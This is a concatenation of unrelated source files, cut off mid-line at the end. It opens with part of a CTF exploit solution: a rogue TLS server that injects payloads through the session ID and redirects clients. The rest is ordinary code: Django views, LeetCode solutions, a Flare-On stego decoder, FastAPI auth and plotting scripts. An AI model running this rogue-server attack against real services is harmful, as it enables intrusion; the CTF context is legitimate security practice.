def _get_server_finished(self):\n session_hash = hashlib.sha256(self.handshake_log).digest()\n return prf(self.session_keys.master_secret, b'server finished', session_hash, 12)\n\n def _encrypt(self, data, tls_type):\n explicit_nonce = get_random_bytes(8)\n cipher = AES.new(self.session_keys.server_key, AES.MODE_GCM, nonce=self.session_keys.server_salt + explicit_nonce)\n cipher.update(to_ad(self.server_seq_num, tls_type, TLS.VERSION, len(data)))\n ciphertext, tag = cipher.encrypt_and_digest(data)\n self.server_seq_num += 1\n return explicit_nonce + ciphertext + tag\n\n def _decrypt(self, data, tls_type, tls_version):\n cipher = AES.new(self.session_keys.client_key, AES.MODE_GCM, nonce=self.session_keys.client_salt + data[:8])\n ciphertext = data[8:-16]\n tag = data[-16:]\n cipher.update(to_ad(self.client_seq_num, tls_type, tls_version, len(ciphertext)))\n self.client_seq_num += 1\n return cipher.decrypt_and_verify(ciphertext, tag)\n\n def read(self):\n record = self._read_record(TLS.DATA_CONTENT_TYPE)\n payload = self._decrypt(record.data, TLS.DATA_CONTENT_TYPE, record.version)\n #print(f'Got a message of length {len(payload)}')\n return payload\n\n def write(self, msg):\n payload = self._encrypt(msg, TLS.DATA_CONTENT_TYPE)\n self._write_record(TLS.Record(TLS.DATA_CONTENT_TYPE, TLS.VERSION, payload))\n #print(f'Sent a message of length {len(payload)}')\n\n def _shake_hands(self):\n client_hello = self._read_handshake_record(0x1).data\n client_random = client_hello[2:2 + 32]\n #print(f'Got client hello')\n\n self._write_handshake_record(TLS.HandshakeRecord(0x2, self._get_server_hello()))\n #print(f'Sent server hello with session id {self.session_id}')\n\n 
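# Handshake type 0xb is Certificate: send the chain so the client can encrypt its premaster secret against the leaf cert's RSA key.\n        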
self._write_handshake_record(TLS.HandshakeRecord(0xb, self._get_certificate()))\n #print(f'Sent {len(self.certs)} certificates')\n\n self._write_handshake_record(TLS.HandshakeRecord(0xe, b''))\n #print(f'Sent server hello done')\n\n # Skip the redundant premaster secret length.\n encrypted_premaster_secret = self._read_handshake_record(0x10).data[2:]\n #print(f'Got a premaster secret')\n self.session_keys = self.derive_keys(encrypted_premaster_secret, client_random)\n\n self._read_record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE)\n client_finished = self._read_handshake_record(TLS.FINISHED_HANDSHAKE_TYPE, decrypt=True)\n #print(f'Got client finished')\n\n self._write_record(TLS.Record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE, TLS.VERSION, b'\\x01'))\n server_finished = TLS.HandshakeRecord(TLS.FINISHED_HANDSHAKE_TYPE, self._get_server_finished())\n self._write_handshake_record(server_finished, encrypt=True)\n #print(f'Sent server finished, the connection is ready')\n\n\ndef get_http_response(code, headers, content):\n headers.update({\n 'Connection': 'close',\n 'Content-Length': str(len(content)),\n })\n\n return '\\r\\n'.join([\n f'HTTP/1.1 {code} Whatever',\n '\\r\\n'.join([\n f'{k}: {v}' for k, v in headers.items()\n ]),\n '',\n content,\n ]).encode()\n\ndef run_rogue_server(key, cert, port, delay, location, payloads):\n payloads += [b'LAST_CHECK_DUMMY']\n def run():\n priv_key = RSA.import_key((Path(__file__).parent / Path(key)).read_text())\n certs = [\n base64.b64decode(''.join(\n cert_line\n for cert_line in cert.splitlines()\n if not cert_line.startswith('-')\n ))\n for cert in (Path(__file__).parent / Path(cert)).read_text().split('\\n\\n')\n ]\n\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_socket.bind(('0.0.0.0', port))\n server_socket.listen(5)\n\n print('Server started.')\n\n success_printed = [False]*len(payloads)\n pi = 0\n while pi < len(payloads):\n client_socket, address = server_socket.accept()\n print(f'Got a connection from {address}!')\n\n print(f'Trying #{pi}')\n session_id = payloads[pi].ljust(32, b'\\0')\n try:\n # Sometimes throw AssertionError due to ALERT_CONTENT_TYPE at self-redirect\n tls = TLS(client_socket, priv_key, certs, session_id)\n http_request = tls.read()\n assert b'fdzz' not in http_request\n except:\n # This indicates that the previous payload redirected to the current payload.\n # Thus, we must retry previous payload.\n print(f'Retry #{pi - 1}...')\n pi -= 1\n client_socket.close()\n continue\n\n if pi > 0 and not success_printed[pi - 1]:\n print(f'Checked #{pi - 1} success. 
(payload {payloads[pi - 1]})')\n                success_printed[pi - 1] = True\n            pi += 1\n\n            time.sleep(delay)\n\n            headers = {\n                'Location': location + '?fdzz',\n            }\n            tls.write(get_http_response(302, headers, ''))\n\n            client_socket.close()\n    \n    t = threading.Thread(target=run, daemon=True)\n    t.start()\n    return t\n","repo_name":"leesh3288/CTF","sub_path":"2022/goq_22s/trino/solution/albireo/TLS/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11133,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"22"} +{"seq_id":"25836689222","text":"import random\nfrom django.shortcuts import render, redirect, reverse\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Subscriber\nfrom .forms import SubscriberForm\n\n\n# Create your views here.\n\n\ndef random_digits():\n    \"\"\"\n    generate random digits for subscriber confirmation number\n    \"\"\"\n    return \"%0.12d\" % random.randint(0, 999999999999)\n\n\n@csrf_exempt\ndef new_subscriber(request):\n    \"\"\"\n    New subscriber confirmation email and view\n    \"\"\"\n    if request.method == \"POST\":\n        email = request.POST.get('email')\n        confirmation_number = random_digits()\n        Subscriber.objects.create(\n            email=email, confirmation_number=confirmation_number)\n        email_subject = 'Newsletter Confirmation'\n        email_message = (\n            'Thank you for signing up for my email newsletter! Please complete \\\n            the process by \\\n            <a href=\"{}/confirm_subscriber/?email={}&confirmation_number={}\"> \\\n            clicking here to confirm your registration.'.format(\n                request.build_absolute_uri(\n                    '/confirm_subscriber/'), email, confirmation_number))\n        send_mail(\n            email_subject,\n            email_message,\n            settings.CONTACT_EMAIL,\n            [email, ]\n        )\n        messages.success(\n            request, f'A confirmation email has been sent to {email}')\n        return render(request, 'home/index.html', {\n            'email': email, 'action': 'added', 'form': SubscriberForm()})\n    else:\n        return render(request, 'home/index.html', {'form': SubscriberForm()})\n\n\ndef confirm_subscriber(request):\n    \"\"\"\n    confirmation email sent with a link\n    \"\"\"\n    sub = Subscriber.objects.get(email=request.GET['email'])\n    if sub.confirmation_number == request.GET['confirmation_number']:\n        sub.confirmed = True\n        sub.save()\n        return render(request, 'home/index.html', {\n            'email': sub.email, 'action': 'confirmed'})\n    else:\n        return render(request, 'home/index.html', {\n            'email': sub.email, 'action': 'denied'})\n\n\ndef delete_subscriber(request):\n    \"\"\"\n    Unsubscribe\n    \"\"\"\n    sub = Subscriber.objects.get(email=request.GET['email'])\n    if sub.confirmation_number == request.GET['confirmation_number']:\n        sub.delete()\n        return render(request, 'home/index.html', {\n            'email': sub.email, 'action': 'unsubscribed'})\n    else:\n        return render(request, 'home/index.html', {\n            'email': sub.email, 'action': 'denied'})\n","repo_name":"Code-Institute-Submissions/Frangelicomk-penelope_swimwear_2022v1_OctResub","sub_path":"newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70538897017","text":"\"\"\"\nGiven 2*n + 1 numbers, every number occurs twice except one, find it.\n\"\"\"\n\nclass Solution:\n    \"\"\"\n    @param A : an integer array\n    @return : an integer\n    \"\"\"\n    def singleNumber(self, A):\n        # write your code 
here\n        result = 0\n        for num in A:\n            result ^= num\n        return result\n","repo_name":"AnthonyNeu/LintCode","sub_path":"Python/Single Number.py","file_name":"Single Number.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"22"} +{"seq_id":"31963855466","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse,JsonResponse\r\nfrom datetime import datetime\r\nfrom myapp.models import District\r\n# Create your views here.\r\n\r\ndef index(request):\r\n\treturn render(request,\"myapp/index.html\")\r\n\r\ndef demo1(request):\r\n\tcontext={}\r\n\tcontext['name']='zhangsan'\r\n\tcontext['a']=[10,20,30]\r\n\tcontext['stu']={'name':'list','age':20}\r\n\tdata=[\r\n\t\t{'name':'q','sex':1,'age':40,'state':0},\r\n\t\t{'name':'w','sex':0,'age':40,'state':2},\r\n\t\t{'name':'e','sex':1,'age':40,'state':1},\r\n\t\t{'name':'r','sex':0,'age':40,'state':2},\r\n\t]\r\n\tcontext['dlist']=data\r\n\tcontext['time']=datetime.now\r\n\tcontext['m1']=100\r\n\tcontext['m2']=20\r\n\treturn render(request,\"myapp/demo1.html\",context)\r\ndef demo2(request):\r\n\treturn render(request,'myapp/demo2.html')\r\n\r\ndef showdistrict(request):\r\n\treturn render(request,\"myapp/district.html\")\r\n\r\ndef district(request,id=0):\r\n\tdlist = District.objects.filter(pid=id)\r\n\tmylist = []\r\n\tfor ob in dlist:\r\n\t\tmylist.append({'pid':ob.pid,'district_name':ob.district_name})\r\n\treturn JsonResponse({'data':mylist})","repo_name":"MAYI-CL/demo","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"765913257","text":"# Retrieve encoded string from sprite.bmp\n# See repository LICENSE\n\nf = open('sprite.bmp', 'rb')\nf.seek(54)\nsprite_data = f.read()\nf.close()\n\nblock_str = ''\n\nfor i in range(13):\n    block_bytes = sprite_data[i*7:i*7+7]\n    block_bits = list(map(lambda x: x & 1, block_bytes))\n    block_chr = chr(sum([bit << (6 - j) for (j, bit) in enumerate(block_bits)]))\n    block_str += block_chr\nprint(block_str)","repo_name":"LeoCodes21/ctf-writeups","sub_path":"Flare-On 2020/06-codeit/bmp_stego_decoder.py","file_name":"bmp_stego_decoder.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"22"} +{"seq_id":"5662907623","text":"from sortedcontainers import SortedList\nfrom typing import List\n\n\nclass Solution:\n    def minAbsoluteDifference(self, nums: List[int], x: int) -> int:\n        myList = SortedList()\n        n = len(nums)\n        res = float('inf')\n        for i, num in enumerate(nums):\n            myList.add(num)\n            if i + x < n:\n                l = myList.bisect_left(nums[i + x])\n                if l == len(myList):\n                    res = min(res, abs(nums[i + x] - myList[l - 1]))\n                else:\n                    res = min(res, abs(nums[i + x] - myList[l - 1]), abs(nums[i + x] - myList[l]))\n\n        return res","repo_name":"KaiKaizxc/Data-stuctures-and-algo","sub_path":"BinarySearch/2817. Minimum Absolute Difference Between Elements With Constraint.py","file_name":"2817. 
Minimum Absolute Difference Between Elements With Constraint.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"22023869773","text":"from typing import Annotated\n\nfrom fastapi import Depends, Security\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\nfrom ghga_service_commons.auth.context import AuthContextProtocol\nfrom ghga_service_commons.auth.ghga import AuthContext, is_active\nfrom ghga_service_commons.auth.policies import require_auth_context_using_credentials\n\nfrom wps.adapters.inbound.fastapi_.dummies import auth_provider\n\n__all__ = [\"RequiresAuthContext\", \"RequiresWorkPackageAccessToken\"]\n\n\nasync def require_active_context(\n credentials: Annotated[\n HTTPAuthorizationCredentials, Depends(HTTPBearer(auto_error=True))\n ],\n auth_provider: Annotated[AuthContextProtocol[AuthContext], Depends(auth_provider)],\n) -> AuthContext:\n \"\"\"Require an active GHGA auth context using FastAPI.\"\"\"\n return await require_auth_context_using_credentials(\n credentials, auth_provider, is_active\n )\n\n\nasync def require_access_token(\n credentials: Annotated[\n HTTPAuthorizationCredentials, Depends(HTTPBearer(auto_error=True))\n ],\n) -> str:\n \"\"\"Require an access token using FastAPI.\"\"\"\n return credentials.credentials\n\n\n# policy that requires (and returns) an active auth context\nRequiresAuthContext = Annotated[AuthContext, Security(require_active_context)]\n\n# policy that requires (and returns) a work package access token\nRequiresWorkPackageAccessToken = Annotated[str, Security(require_access_token)]\n","repo_name":"ghga-de/work-package-service","sub_path":"src/wps/adapters/inbound/fastapi_/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38186506119","text":"import numpy as np\nimport pickle\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport string\nimport random\n\ndef compare_plot(x1:np.ndarray,y1:np.ndarray,x2:np.ndarray,y2:np.ndarray,\n xlabel: str,ylabel:str,title:str,label1:str,label2:str):\n \n if (x1.shape != y1.shape) or (x2.shape != y2.shape):\n return None\n else:\n fig, ax = plt.subplots()\n ax.plot(x1, y1, 'b', linewidth = 4, label=label1)\n ax.plot(x2, y2, 'r', linewidth = 2, label=label2)\n ax.set(xlabel=xlabel, ylabel=ylabel, title=title)\n ax.legend()\n return fig\n\ndef parallel_plot(x1:np.ndarray,y1:np.ndarray,x2:np.ndarray,y2:np.ndarray,\n x1label:str,y1label:str,x2label:str,y2label:str,title:str,orientation:str):\n if (x1.shape != y1.shape) or (x2.shape != y2.shape) or min(x1.shape) == 0 or min(x2.shape) == 0:\n return None\n if orientation == '-':\n fig, (ax1, ax2) = plt.subplots(2,1)\n elif orientation == '|':\n fig, (ax1, ax2) = plt.subplots(1,2)\n ax1.plot(x1, y1)\n ax1.set(xlabel=x1label, ylabel=y1label)\n ax2.plot(x2, y2)\n ax2.set(xlabel=x2label, ylabel=y2label)\n fig.suptitle(title)\n return fig\n\ndef log_plot(x:np.ndarray,y:np.ndarray,xlabel:str,ylabel:str,title:str,log_axis:str): \n if x.shape != y.shape:\n return None\n fig, ax = plt.subplots() \n ax.plot(x, y)\n ax.set(xlabel=xlabel, ylabel=ylabel, title=title)\n if log_axis == 'x':\n ax.set_xscale('log')\n elif log_axis == 'y':\n ax.set_yscale('log')\n else:\n ax.set_xscale('log')\n ax.set_yscale('log')\n return fig ","repo_name":"Motylek137/metody_numeryczne","sub_path":"laboratorium 
2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"41165436332","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef moving_average(x, width):\n return np.convolve(x, np.ones(width), 'same') / width\n\n\ndef show_curve(positions):\n x = np.arange(0, len(positions))\n y = positions\n plt.plot(x, y, color='red', linewidth=1)\n plt.show()\n\n\nif __name__ == '__main__':\n # pos = np.sin(np.arange(0, 2, 0.01))\n # show_curve(pos)\n from video_source import VideoSource\n from AlphaPose.AlphaDetector import AlphaDetector\n\n video_path = './4.mp4'\n vs = VideoSource(video_path, webcam=False)\n dt = AlphaDetector()\n positions = []\n ratio = []\n for ori, fid in vs:\n pose_dic = dt.pre_one(ori)\n if not pose_dic:\n continue\n positions.append(pose_dic['19'][1])\n ratio.append(pose_dic['19'][1] - pose_dic['18'][1])\n print(pose_dic['19'][1])\n print(pose_dic['18'][1] - pose_dic['19'][1])\n\n positions = np.array(positions)\n avg_positions = moving_average(positions, 3)\n\n ratio = np.array(ratio)\n velocitys = positions[1:] - positions[:-1]\n modified_ratio = (ratio[1:] + ratio[:-1]) / 2\n modified_velocitys = velocitys * (170 / modified_ratio)\n\n avg_velocity = moving_average(modified_velocitys, 3)\n show_curve(modified_velocitys)\n show_curve(avg_velocity)\n # show_curve(positions)\n # show_curve(avg_positions)\n","repo_name":"WWWzk/smart-sport","sub_path":"show_curve.py","file_name":"show_curve.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"16757818000","text":"'''\n给定一个由空格分割单词的句子 S。每个单词只包含大写或小写字母。\n\n我们要将句子转换为 “Goat Latin”(一种类似于 猪拉丁文 - Pig Latin 的虚构语言)。\n\n山羊拉丁文的规则如下:\n\n如果单词以元音开头(a, e, i, o, u),在单词后添加\"ma\"。\n例如,单词\"apple\"变为\"applema\"。\n\n如果单词以辅音字母开头(即非元音字母),移除第一个字符并将它放到末尾,之后再添加\"ma\"。\n例如,单词\"goat\"变为\"oatgma\"。\n\n根据单词在句子中的索引,在单词最后添加与索引相同数量的字母'a',索引从1开始。\n例如,在第一个单词后添加\"a\",在第二个单词后添加\"aa\",以此类推。\n返回将 S 转换为山羊拉丁文后的句子。\n\n示例 1:\n\n输入: \"I speak Goat Latin\"\n输出: \"Imaa peaksmaaa oatGmaaaa atinLmaaaaa\"\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/goat-latin\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\nclass Solution(object):\n def toGoatLatin(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n S = S.split()\n new = []\n for i,word in enumerate(S):\n if word[0] in ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']:\n new.append(word+'ma'+'a'*(i+1))\n else:\n w = word[1:]+word[0]\n new.append(w+'ma'+'a'*(i+1))\n return ' '.join(new)\n\nS = \"I speak Goat Latin\"\nSolution().toGoatLatin(S)","repo_name":"Code-ZYJ/Leecode_everyday","sub_path":"山羊拉丁文.py","file_name":"山羊拉丁文.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1354571335","text":"from flask import request, jsonify, json\nfrom flask_restful import Resource\nfrom models.categoria import CategoriaModel\nfrom sqlalchemy.orm import sessionmaker\nfrom db import session\n\n\nclass CategoriaList(Resource):\n def get(self):\n categorias = session.query(CategoriaModel).order_by(CategoriaModel.nome)\n categorias = [c.serialize for c in categorias]\n return jsonify(categorias) # jsonify({'store': stores})\n\n\nclass CategoriaResource(Resource):\n def get(self, id):\n categoria = session.query(CategoriaModel).get(id)\n return jsonify(categoria.serialize)\n\n def post(self, 
categoria):\n        session.add(CategoriaModel(request.json['id'], request.json['nome']))\n        session.commit()\n        return json.dumps(request.json), 201\n\n    def delete(self, id):\n        categoria = session.query(CategoriaModel).get(id)\n        session.delete(categoria)\n        session.commit()\n        return jsonify(categoria.serialize)\n\n    def put(self, id):\n        categoria = session.query(CategoriaModel).get(id)\n        categoria.nome = request.json.get('nome', categoria.nome)\n        session.commit()\n        return jsonify(categoria.serialize)\n        # return {'item': None}, 404\n\n","repo_name":"jgbcientista/Sistema-de-Monitoramento-JAVA","sub_path":"smt-frontend/server/resources/categoria.py","file_name":"categoria.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"5694601283","text":"# tipper type, tipped\r\na = float(input(\"type the total $ amount of your bill then press enter__\"))\r\nc = a*.15\r\nd = a*.20\r\ne = a* 2\r\nb = (c, d, e)\r\nr=\"15%\"\r\nf='20%'\r\nv=\"200%\"\r\nprint(\"a tip amount of 15% would equal=\", c)\r\nprint(\"a tip amount of\",f,\"would equal =\",d)\r\nprint(\"If you want to tip big tip\", v, \"=\", e)\r\n# added extra to play with variables and functions\r\ninput(\"press enter to end\")\r\n","repo_name":"nibbletobits/nibbletobits","sub_path":"python/day 2 home work 3.py","file_name":"day 2 home work 3.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70604614457","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom math import prod\nfrom pathlib import Path\n\nfrom helpers import read_input_as_string_array\n\n\n@dataclass\nclass Packet:\n    version: int\n    type_id: int\n    literal_value: int | None\n    sub_packets: list[Packet] | None\n\n\ndef read_input(filename: Path | str) -> str:\n    input_string = read_input_as_string_array(filename)[0]\n    return convert_hex_to_binary(input_string)\n\n\ndef convert_hex_to_binary(hex_string: str) -> str:\n    chunks = [hex_string[i : i + 2] for i in range(0, len(hex_string), 2)]\n    return \"\".join([\"{:08b}\".format(int(chunk, 16)) for chunk in chunks])\n\n\ndef parse_packets(\n    binary_data: str,\n    trim_bits: bool = True,\n    count: int | None = None,\n) -> tuple[list[Packet], str]:\n    packets: list[Packet] = []\n\n    while binary_data != \"\":\n        try:\n            packet_version, binary_data = get_packet_version(binary_data)\n            packet_type_id, binary_data = get_packet_type_id(binary_data)\n            literal_value = None\n            sub_packets = None\n\n            if packet_type_id == 4:\n                literal_value, binary_data = get_literal_value(binary_data, trim_bits)\n            else:\n                sub_packets, binary_data = get_operator(binary_data)\n\n            if literal_value or sub_packets:\n                packets.append(\n                    Packet(\n                        packet_version,\n                        packet_type_id,\n                        literal_value,\n                        sub_packets,\n                    ),\n                )\n        except (IndexError, ValueError):\n            break\n\n        if count and len(packets) == count:\n            break\n\n    return packets, binary_data\n\n\ndef get_packet_version(binary_data: str) -> tuple[int, str]:\n    return int(binary_data[:3], 2), binary_data[3:]\n\n\ndef get_packet_type_id(binary_data: str) -> tuple[int, str]:\n    return int(binary_data[:3], 2), binary_data[3:]\n\n\ndef get_literal_value(binary_data: str, trim_bits: bool) -> tuple[int, str]:\n    start_index = 0\n    literal_value_string = \"\"\n\n    while True:\n        indicator_bit = int(binary_data[start_index])\n\n        start_index = start_index + 1\n        end_index = start_index + 4\n\n        literal_value_string += 
binary_data[start_index:end_index]\n start_index = end_index\n\n if indicator_bit == 0:\n break\n\n literal_value = int(literal_value_string, 2)\n\n if trim_bits:\n prefix_length = 6\n remainder = (start_index + prefix_length) % 4\n\n while remainder > 0:\n start_index += 1\n remainder = (start_index + prefix_length) % 4\n\n return literal_value, binary_data[start_index:]\n\n\ndef get_operator(binary_data: str) -> tuple[list[Packet], str]:\n length_type_id = int(binary_data[0])\n\n if length_type_id == 0:\n start_index = 16\n length = int(binary_data[1:start_index], 2)\n end_index = start_index + length\n sub_binary_data = binary_data[start_index:end_index]\n sub_packets, _ = parse_packets(sub_binary_data, trim_bits=False)\n binary_data = binary_data[end_index:]\n else:\n start_index = 12\n length = int(binary_data[1:start_index], 2)\n sub_binary_data = binary_data[start_index:]\n sub_packets, binary_data = parse_packets(\n sub_binary_data,\n trim_bits=False,\n count=length,\n )\n\n return sub_packets, binary_data\n\n\ndef sum_version_numbers(packets: list[Packet] | None) -> int:\n return (\n sum(\n packet.version + sum_version_numbers(packet.sub_packets)\n for packet in packets\n )\n if packets\n else 0\n )\n\n\ndef evaluate_packets(packet: Packet) -> int:\n if packet.type_id == 4:\n return packet.literal_value or 0\n\n if not packet.sub_packets:\n return 0\n\n if packet.type_id == 0:\n return sum(evaluate_packets(sub_packet) for sub_packet in packet.sub_packets)\n\n if packet.type_id == 1:\n return prod(evaluate_packets(sub_packet) for sub_packet in packet.sub_packets)\n\n if packet.type_id == 2:\n return min(evaluate_packets(sub_packet) for sub_packet in packet.sub_packets)\n\n if packet.type_id == 3:\n return max(evaluate_packets(sub_packet) for sub_packet in packet.sub_packets)\n\n if packet.type_id == 5:\n return (\n 1\n if evaluate_packets(packet.sub_packets[0])\n > evaluate_packets(packet.sub_packets[1])\n else 0\n )\n\n if packet.type_id == 6:\n return (\n 1\n if evaluate_packets(packet.sub_packets[0])\n < evaluate_packets(packet.sub_packets[1])\n else 0\n )\n\n if packet.type_id == 7:\n return (\n 1\n if evaluate_packets(packet.sub_packets[0])\n == evaluate_packets(packet.sub_packets[1])\n else 0\n )\n\n return 0\n\n\ndef part_one(binary_data: str) -> int:\n packets, _ = parse_packets(binary_data)\n return sum_version_numbers(packets)\n\n\ndef part_two(binary_data: str) -> int:\n packets, _ = parse_packets(binary_data)\n return evaluate_packets(packets[0])\n\n\nif __name__ == \"__main__\":\n binary_input: str = read_input(\"input.txt\")\n print(part_one(binary_input))\n print(part_two(binary_input))\n","repo_name":"avendesora/advent-of-code-python","sub_path":"advent_of_code_2021/day16/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"21953044763","text":"#!/usr/bin/env python\nfrom bs4 import BeautifulSoup\nimport sys\nimport json\nimport argparse\nimport re\nfrom slugify import slugify\n\ntool_chest_html = 'do-tool-chest.html'\n\nclass ToolChest:\n def __init__(self):\n self.soup = None\n self.tool_list = None\n self.categories_list = None\n\n def body(self):\n if self.soup == None:\n with open(tool_chest_html) as f:\n self.soup = BeautifulSoup(f, 'html.parser', from_encoding=\"ascii\")\n return self.soup.body\n\n def section(self, section_id):\n sections = self.body().find_all('section')\n for section in sections:\n if section.has_attr('id') and 
section_id in section.get('id'):\n return section\n\n def categories(self):\n \"\"\" Returns a dict, where the key is the category id, and the value\n is the category name. \"\"\"\n if self.categories_list != None: return self.categories_list\n\n # The 'tool-chest' section of the HTML contains categories as well as\n # tool content\n section = self.section(\"tool-chest\")\n\n # The 'dropdown-menu' ul class has the categories\n ul = section.find('ul', attrs={\"class\": \"dropdown-menu\"} )\n links = ul.find_all(\"a\", attrs={\"class\": \"filter\"} )\n\n d = {}\n for link in links:\n # The 'data-filter' attribute in the HTML is the ID for the category\n text = link.get_text()\n # Strip leading '.' from category id\n f = link['data-filter']\n #d[f.strip('.')] = text.encode('ascii', 'ignore')\n d[f.strip('.')] = text\n\n self.categories_list = d\n return self.categories_list\n\n def categories_more(self):\n \"\"\" Returns an array of dicts with the following keys:\n - type (the category type-id)\n - category (the category name)\n - cat (slugified category)\n \"\"\"\n l=[]\n for t,c in self.categories().items():\n l.append({\"type\":t, \"category\":c, \"cat\": slugify(c) })\n return l\n\n def tools(self):\n \"\"\" Looks up the section of the data with tools and returns a dict\n with the key being the tool-id, and the value being a dict of\n all the attributes about the tool, including:\n - name, id, class, link, img, text, category\n \"\"\"\n if self.tool_list != None: return self.tool_list\n\n section = self.section(\"tool-chest\")\n div = section.find('div', attrs={\"id\": \"mixitup\", \"class\": \"panel\"} )\n tools = div.find_all('div')\n\n d = []\n for tool in tools:\n # data-name is the tool title\n # data-id is the id of the tool\n # class contains the classes applying to this tool, including categories\n tool_name, tool_id = tool.get(\"data-name\"), tool.get(\"data-id\")\n tool_classes = [l for l in tool.get(\"class\")]\n link, img = tool.a.get(\"href\"), tool.img.get(\"src\")\n text = tool.p.get_text()\n categories = []\n for c_id, c_n in self.categories().items():\n if c_id in tool_classes: categories.append(c_n)\n #categories = [x for x, y in zip(self.categories().keys(), tool_classes) if y == x]\n #print(\"name %s id %s link %s img %s\\nclass '%s'\\ntext '%s'\\n\" % (tool_name, tool_id, link, img, tool_classes, text))\n h = {'name': tool_name, 'id': tool_id, 'class': tool_classes, 'link': link, 'img': img, 'text': text, 'category': categories, 'cat': slugify(categories[0]) }\n d.append(h)\n\n self.tool_list = d\n return self.tool_list\n\n def category(self, name):\n \"\"\" Looks up the category of each tool and returns them as a list. 
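Accepts a single category name or a list of names; a tool matches when any of the corresponding category type-ids appears in its classes. 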
\"\"\"\n cat_list = [name]\n if type(name) == type([]):\n cat_list = name\n\n cat_id_list = []\n for type_id, c in self.categories().items():\n for name in cat_list:\n if name == c:\n cat_id_list.append(type_id)\n\n tool_list = []\n for tool in self.tools():\n for cat_id in cat_id_list:\n if cat_id in tool[\"class\"]:\n #print(\"tool %s\" % d[\"name\"])\n tool_list.append(tool)\n\n return tool_list\n\ndef main():\n page = ToolChest()\n\n parser = options()\n o = parser.parse_args()\n if o.categories == None and o.categories_more == None and o.tools == None:\n parser.print_help()\n exit(1)\n\n if o.categories != None:\n if len(o.categories) > 0:\n print(json.dumps( page.category(o.categories) ))\n else:\n print(json.dumps(page.categories()))\n\n if o.categories_more != None:\n if len(o.categories_more) > 0:\n print(json.dumps( page.category(o.categories) ))\n else:\n print(json.dumps(page.categories_more()))\n\n if o.tools != None:\n print( json.dumps( page.tools() ) )\n\n return(0)\n\ndef options():\n parser = argparse.ArgumentParser(description='Decode the XebiaLabs DevOps tools page')\n parser.add_argument('--categories', nargs='*', help='List all categories of tools, or all tools in a category')\n parser.add_argument('--categories-more', nargs='*', help='List all categories of tools, or all tools in a category, in more detail')\n parser.add_argument('--tools', nargs='*', help='List all the tools')\n return parser\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"peterwwillis/devopsyoga-content","sub_path":"tools/tool_chest/tool_chest.py","file_name":"tool_chest.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"22"} +{"seq_id":"8831437268","text":"from __future__ import absolute_import\n\nfrom mysite.celery_app import app\nfrom .classes import PayoutManager\nfrom django.core.cache import cache\n\nLOCK_EXPIRE = 300 # Lock expires in 5 minutes\nSHARED_LOCK_NAME = \"payout_task\"\n\n@app.task(bind=True)\ndef payout_task(self, contests=None):\n lock_id = '%s-LOCK-payout[%s]'\n\n acquire_lock = lambda: cache.add(lock_id, 'true', LOCK_EXPIRE)\n release_lock = lambda: cache.delete(lock_id)\n\n if acquire_lock():\n try:\n pm = PayoutManager()\n pm.payout(contests)\n finally:\n release_lock()\n else:\n self.retry(countdown=1, max_retries=100)\n\n\n\n","repo_name":"nakamotohideyoshi/draftboard-web","sub_path":"contest/payout/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35497148856","text":"from pymongo import MongoClient\nfrom pprint import pprint\nimport gridfs\nfrom bson import objectid\n\n\nclient = MongoClient(port=27017)\n\ndb = client.inventorydb\n\n\n\nfs = gridfs.GridFS(db)\n\npath_in = 